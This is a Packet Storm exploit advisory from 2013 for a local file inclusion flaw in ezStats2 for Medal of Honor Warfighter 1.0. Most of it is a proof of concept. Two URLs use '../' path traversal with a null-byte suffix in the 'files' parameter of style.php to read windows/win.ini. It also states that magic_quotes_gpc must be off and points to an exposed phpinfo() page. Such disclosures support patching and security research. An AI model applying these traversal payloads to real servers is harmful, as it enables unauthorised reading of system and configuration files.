ezStats2 For Medal Of Honor Warfighter 1.0 Local File Inclusion

2013-02-05T00:00:00
ID PACKETSTORM:120071
Type packetstorm
Reporter L0n3ly-H34rT
Modified 2013-02-05T00:00:00

Description

                                        
                                            `#################################################  
### Exploit Title: ezStats2 for Medal of Honor Warfighter v1.0 Local File Inclusion Vulnerability  
### Date: 02/05/2013  
### Author: L0n3ly-H34rT  
### Contact: l0n3ly_h34rt@hotmail.com  
### My Site: http://se3c.blogspot.com/  
### Vendor Link: http://www.ezstats.org/  
### Software Link: http://ezstats.googlecode.com/files/ezStats2_MoHW_v1.0a.zip  
### Tested on: Linux/Windows   
#################################################  
  
http://127.0.0.1/ezStats2_mohw/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg  
  
http://127.0.0.1/ezStats2_mohw/admin/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg  
  
############################################  
  
# Notes :  
  
1- Must be magic_quotes_gpc = Off  
  
2- phpinfo() :  
  
http://127.0.0.1/ezStats2_mohw/admin/apitest.php?info  
  
# Greetz to my friendz  
`